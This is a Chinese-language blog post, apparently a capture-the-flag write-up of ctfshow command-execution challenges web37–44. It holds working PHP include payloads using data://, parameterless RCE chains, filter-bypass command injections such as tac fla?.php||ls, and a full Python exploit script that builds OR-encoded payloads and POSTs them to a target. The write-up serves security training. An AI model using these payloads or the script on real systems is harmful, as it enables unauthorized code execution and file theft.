<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="web37开启容器，题目提示 1命令执行，需要严格的过滤   变量c直接被包含了 可以用data:&#x2F;&#x2F;伪协议当它与包含函数结合时，用户输入的data:&#x2F;&#x2F;流会被当作php文件执行。php配置需要allow_url_fopen,allow_url_include均为on 12payload1: ?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php system(&quot;">
<meta property="og:type" content="article">
<meta property="og:title" content="web37-44">
<meta property="og:url" content="https://youngking-gfy.github.io/2025/03/12/web37-44/index.html">
<meta property="og:site_name" content="Youngking&#39;s Blog">
<meta property="og:description" content="web37开启容器，题目提示 1命令执行，需要严格的过滤   变量c直接被包含了 可以用data:&#x2F;&#x2F;伪协议当它与包含函数结合时，用户输入的data:&#x2F;&#x2F;流会被当作php文件执行。php配置需要allow_url_fopen,allow_url_include均为on 12payload1: ?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php system(&quot;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312143238964.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312144000233.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312144931988.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312144641797.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312145129757.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312150229643.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312151057634.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312152233344.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312152433613.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312152635159.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250417134338701.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250417134418599.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312155428575.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312155807792.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312155617002.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312160116653.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312160207280.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312160503801.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312160812316.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312160850228.png">
<meta property="article:published_time" content="2025-03-12T06:31:19.000Z">
<meta property="article:modified_time" content="2025-04-17T05:44:28.603Z">
<meta property="article:author" content="Y0ungK1ng">
<meta property="article:tag" content="命令执行">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://youngking-gfy.github.io/2025/03/12/web37-44/file-20250312143238964.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>web37-44</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/youngking-gfy">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/03/13/web45-52/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/03/11/web29-36/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://youngking-gfy.github.io/2025/03/12/web37-44/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&text=web37-44"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&is_video=false&description=web37-44"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=web37-44&body=Check out this article: https://youngking-gfy.github.io/2025/03/12/web37-44/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&name=web37-44&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://youngking-gfy.github.io/2025/03/12/web37-44/&t=web37-44"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#web37"><span class="toc-number">1.</span> <span class="toc-text">web37</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web38"><span class="toc-number">2.</span> <span class="toc-text">web38</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web39"><span class="toc-number">3.</span> <span class="toc-text">web39</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web40"><span class="toc-number">4.</span> <span class="toc-text">web40</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web41"><span class="toc-number">5.</span> <span class="toc-text">web41</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web42"><span class="toc-number">6.</span> <span class="toc-text">web42</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web43"><span class="toc-number">7.</span> <span class="toc-text">web43</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web44"><span class="toc-number">8.</span> <span class="toc-text">web44</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        web37-44
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Y0ungK1ng</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-03-12T06:31:19.000Z" class="dt-published" itemprop="datePublished">2025-03-12</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E5%AE%89%E5%85%A8/">渗透安全</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag">命令执行</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="web37"><a href="#web37" class="headerlink" title="web37"></a>web37</h3><p>开启容器，题目提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">命令执行，需要严格的过滤</span><br></pre></td></tr></table></figure>

<p><img src="/2025/03/12/web37-44/file-20250312143238964.png"></p>
<p>变量c直接被包含了</p>
<p>可以用<code>data://</code>伪协议<br>当它与包含函数结合时，用户输入的data:&#x2F;&#x2F;流会被当作php文件执行。<br>php配置需要allow_url_fopen,allow_url_include均为on</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload1: ?c=data://text/plain,&lt;?php system(&quot;cat f*&quot;)?&gt; //查看flag.php，右键源码中查找flag </span><br><span class="line">payload2: ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==</span><br></pre></td></tr></table></figure>

<p>payload1<br><img src="/2025/03/12/web37-44/file-20250312144000233.png"></p>
<p>payload2<br><img src="/2025/03/12/web37-44/file-20250312144931988.png"></p>
<h3 id="web38"><a href="#web38" class="headerlink" title="web38"></a>web38</h3><p>开启容器，题目提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">命令执行，需要严格的过滤</span><br></pre></td></tr></table></figure>

<p><img src="/2025/03/12/web37-44/file-20250312144641797.png"></p>
<p>除了flag、file也被过滤了</p>
<p>同样payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==</span><br></pre></td></tr></table></figure>

<p><img src="/2025/03/12/web37-44/file-20250312145129757.png"></p>
<h3 id="web39"><a href="#web39" class="headerlink" title="web39"></a>web39</h3><p>开启容器，题目提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">命令执行，需要严格的过滤</span><br></pre></td></tr></table></figure>

<p><img src="/2025/03/12/web37-44/file-20250312150229643.png"></p>
<p><code>?c=data://text/plain,&lt;?php%20system(&quot;cat%20f*&quot;)?&gt;</code></p>
<p><code>data://text/plain</code>这样就相当于执行了php语句，其实本次添加后缀不起作用</p>
<blockquote>
<p>在 PHP 中，<code>data://text/plain</code> 是一种数据 URI 方案，用于将数据嵌入到代码中，而不需要引用外部文件。它允许你直接在代码中定义数据，PHP 可以像处理普通文件一样处理这些数据。<br>include （或 require）语句会获取指定文件中存在的所有文本&#x2F;代码&#x2F;标记，并复制到使用 include 语句的文件中。<br>伪协议中的<code>data://</code>，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data:&#x2F;&#x2F;流会被当作php文件执行</p>
</blockquote>
<p><code>$flag=&quot;ctfshow&#123;**&#125;&quot;;.php</code></p>
<p><img src="/2025/03/12/web37-44/file-20250312151057634.png"></p>
<p><code>$flag=&quot;ctfshow&#123;1625ce72-7342-49a3-8e2b-5492981d6e3c&#125;&quot;;.php</code></p>
<h3 id="web40"><a href="#web40" class="headerlink" title="web40"></a>web40</h3><p>开启容器，题目提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">命令执行，需要严格的过滤</span><br></pre></td></tr></table></figure>

<p>发现“.”都被被过滤<br>但是括号很细节，是中文的，所以可以用英文括号<br>只能利用无参数命令执行</p>
<p>函数：<code>print_r(scandir(&#39;.&#39;))</code>可以用来查看当前目录所有文件名<br>接下来需要将括号中的<code>.</code>替代掉</p>
<p><img src="/2025/03/12/web37-44/file-20250312152233344.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>())));</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">pos</span>(<span class="title function_ invoke__">localeconv</span>())));</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">reset</span>(<span class="title function_ invoke__">localeconv</span>())));</span><br><span class="line"><span class="comment">//以上函数均可查看当前目录文件</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2025/03/12/web37-44/file-20250312152433613.png"></p>
<p>找到flag.php</p>
<p>flag.php位于数组的第三个值里，也就是倒数第二个，我们可以通过<code>array_reverse()</code>函数以相反的元素顺序返回数组，在用<code>next()</code>函数读取下一个元素，最后通过<code>highlight_file()</code>函数读取到flag.php</p>
<p><code>payload：c=highlight_file(next(array_reverse(scandir(current(localeconv())))));</code></p>
<p><img src="/2025/03/12/web37-44/file-20250312152635159.png"></p>
<p>同时可以用无参数RCE</p>
<p><code>?c=eval(end(current(get_defined_vars())));&amp;b=system(&#39;ls&#39;);</code></p>
<p><img src="/2025/03/12/web37-44/file-20250417134338701.png"></p>
<p><img src="/2025/03/12/web37-44/file-20250417134418599.png"></p>
<h3 id="web41"><a href="#web41" class="headerlink" title="web41"></a>web41</h3><p>开启容器，题目提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**过滤不严，命令执行**</span><br></pre></td></tr></table></figure>

<p>数字、字母都不能用，可以直接用异脚本构造<br>其中按位异 | 没有过滤</p>
<p>运用脚本</p>
<p>rce_or</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$myfile</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;rce_or.txt&quot;</span>, <span class="string">&quot;w&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$contents</span>=<span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="number">256</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (<span class="variable">$j</span>=<span class="number">0</span>; <span class="variable">$j</span> &lt;<span class="number">256</span> ; <span class="variable">$j</span>++) &#123;</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$i</span>&lt;<span class="number">16</span>)&#123;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$hex_i</span>=<span class="string">&#x27;0&#x27;</span>.<span class="title function_ invoke__">dechex</span>(<span class="variable">$i</span>);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$hex_i</span>=<span class="title function_ invoke__">dechex</span>(<span class="variable">$i</span>);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$j</span>&lt;<span class="number">16</span>)&#123;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$hex_j</span>=<span class="string">&#x27;0&#x27;</span>.<span class="title function_ invoke__">dechex</span>(<span class="variable">$j</span>);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$hex_j</span>=<span class="title function_ invoke__">dechex</span>(<span class="variable">$j</span>);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$preg</span> = <span class="string">&#x27;/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\&#123;|\&#125;|\&amp;|\-/i&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="variable">$preg</span> , <span class="title function_ invoke__">hex2bin</span>(<span class="variable">$hex_i</span>))||<span class="title function_ invoke__">preg_match</span>(<span class="variable">$preg</span> , <span class="title function_ invoke__">hex2bin</span>(<span class="variable">$hex_j</span>)))&#123;</span><br><span class="line"></span><br><span class="line">                    <span class="keyword">echo</span> <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$a</span>=<span class="string">&#x27;%&#x27;</span>.<span class="variable">$hex_i</span>;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$b</span>=<span class="string">&#x27;%&#x27;</span>.<span class="variable">$hex_j</span>;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$c</span>=(<span class="title function_ invoke__">urldecode</span>(<span class="variable">$a</span>)|<span class="title function_ invoke__">urldecode</span>(<span class="variable">$b</span>));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">ord</span>(<span class="variable">$c</span>)&gt;=<span class="number">32</span>&amp;<span class="title function_ invoke__">ord</span>(<span class="variable">$c</span>)&lt;=<span class="number">126</span>) &#123;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$contents</span>=<span class="variable">$contents</span>.<span class="variable">$c</span>.<span class="string">&quot; &quot;</span>.<span class="variable">$a</span>.<span class="string">&quot; &quot;</span>.<span class="variable">$b</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">fwrite</span>(<span class="variable">$myfile</span>,<span class="variable">$contents</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$myfile</span>);</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> sys <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">os.system(<span class="string">&quot;php rce_or.php&quot;</span>)  <span class="comment">#没有将php写入环境变量需手动运行</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">len</span>(argv)!=<span class="number">2</span>):</span><br><span class="line"></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;=&quot;</span>*<span class="number">50</span>)</span><br><span class="line"></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&#x27;USER：python exp.py &lt;url&gt;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;eg：  python exp.py http://ctf.show/&quot;</span>)</span><br><span class="line"></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;=&quot;</span>*<span class="number">50</span>)</span><br><span class="line"></span><br><span class="line">   exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">url=argv[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">action</span>(<span class="params">arg</span>):</span><br><span class="line"></span><br><span class="line">   s1=<span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">   s2=<span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">   <span class="keyword">for</span> i <span class="keyword">in</span> arg:</span><br><span class="line"></span><br><span class="line">       f=<span class="built_in">open</span>(<span class="string">&quot;rce_or.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line"></span><br><span class="line">       <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"></span><br><span class="line">           t=f.readline()</span><br><span class="line"></span><br><span class="line">           <span class="keyword">if</span> t==<span class="string">&quot;&quot;</span>:</span><br><span class="line"></span><br><span class="line">               <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">           <span class="keyword">if</span> t[<span class="number">0</span>]==i:</span><br><span class="line"></span><br><span class="line">               <span class="comment">#print(i)</span></span><br><span class="line"></span><br><span class="line">               s1+=t[<span class="number">2</span>:<span class="number">5</span>]</span><br><span class="line"></span><br><span class="line">               s2+=t[<span class="number">6</span>:<span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">               <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">       f.close()</span><br><span class="line"></span><br><span class="line">   output=<span class="string">&quot;(\&quot;&quot;</span>+s1+<span class="string">&quot;\&quot;|\&quot;&quot;</span>+s2+<span class="string">&quot;\&quot;)&quot;</span></span><br><span class="line"></span><br><span class="line">   <span class="keyword">return</span>(output)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"></span><br><span class="line">   param=action(<span class="built_in">input</span>(<span class="string">&quot;\n[+] your function：&quot;</span>) )+action(<span class="built_in">input</span>(<span class="string">&quot;[+] your command：&quot;</span>))</span><br><span class="line"></span><br><span class="line">   data=&#123;</span><br><span class="line"></span><br><span class="line">       <span class="string">&#x27;c&#x27;</span>:urllib.parse.unquote(param)</span><br><span class="line"></span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">   r=requests.post(url,data=data)</span><br><span class="line"></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;\n[*] result:\n&quot;</span>+r.text)</span><br></pre></td></tr></table></figure>


<p><img src="/2025/03/12/web37-44/file-20250312155428575.png"><br>跑脚本只需要http即可，防止ssl证书导致脚本中断</p>
<p><img src="/2025/03/12/web37-44/file-20250312155807792.png"></p>
<h3 id="web42"><a href="#web42" class="headerlink" title="web42"></a>web42</h3><p>开启容器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">命令执行，需要严格的过滤</span><br></pre></td></tr></table></figure>


<p>回显黑洞，直接间隔开命令即可<br><img src="/2025/03/12/web37-44/file-20250312155617002.png"></p>
<p><code>/?c=cat%20flag.php;ls</code></p>
<p><img src="/2025/03/12/web37-44/file-20250312160116653.png"></p>
<h3 id="web43"><a href="#web43" class="headerlink" title="web43"></a>web43</h3><p>开启容器</p>
<p><img src="/2025/03/12/web37-44/file-20250312160207280.png"></p>
<p>同样的黑洞，只过滤cat，可以用tac<br><code>;</code>被过滤，<code>||</code> <code>&amp;&amp;</code>这两个可以进行截断代替，但需要注意的是<code>&amp;&amp;</code>需要进行url编码，这样才能成功执行：</p>
<p><code>/?c=tac%20flag.php||ls</code></p>
<p><img src="/2025/03/12/web37-44/file-20250312160503801.png"></p>
<h3 id="web44"><a href="#web44" class="headerlink" title="web44"></a>web44</h3><p>开启容器</p>
<p><img src="/2025/03/12/web37-44/file-20250312160812316.png"></p>
<p>flag也被过滤</p>
<p><code>/?c=tac%20fla?.php||ls</code></p>
<p><img src="/2025/03/12/web37-44/file-20250312160850228.png"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">categories</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/youngking-gfy">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
